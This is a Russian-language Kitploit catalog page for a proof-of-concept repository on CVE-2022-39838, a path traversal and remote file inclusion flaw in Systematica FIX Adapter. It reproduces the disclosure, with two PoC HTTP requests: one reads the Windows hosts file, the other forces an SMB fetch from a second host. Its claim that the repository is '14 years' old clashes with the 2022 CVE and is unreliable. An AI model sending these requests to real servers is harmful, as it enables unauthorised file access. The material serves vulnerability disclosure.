Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-39838 — Эксплойт для проверки концепции для CVE-2022-39838, демонстрирующий удаленное включение файлов и абсолютный обход пути в Systematica FIX Adapter (ALFAFX) 2.4.0.25 через HTTP-запросы. | Kitploit
Инструменты/GitHubGitHub/jet-pentest/cve-2022-39838
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubjet-pentest/cve-2022-39838

CVE-2022-39838

Эксплойт для проверки концепции для CVE-2022-39838, демонстрирующий удаленное включение файлов и абсолютный обход пути в Systematica FIX Adapter (ALFAFX) 2.4.0.25 через HTTP-запросы.

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-39838

[Предлагаемое описание]

Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 позволяет удаленное включение файла через UNC-путь, а также абсолютный path traversal к локальным путям.

[Дополнительная информация]

PoC:

http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts

http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt

[Тип уязвимости]

Некорректный контроль доступа

[Поставщик продукта]

Systematica

[База кода затронутого продукта]

Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)

[Тип атаки]

Удаленная

[Раскрытие информации о воздействии]

true

[Векторы атаки]

Удаленный пользователь может получить доступ к произвольному файлу в ОС через абсолютный путь. Также удаленный пользователь может принудить уязвимый сервер запросить файл с другой машины через SMB.

[Обнаружил]

Ivashchenko Sergey (Jet Infosystems, jet.su)

[Ссылка]

http://systematicalpha.com/company

Скачать инструмент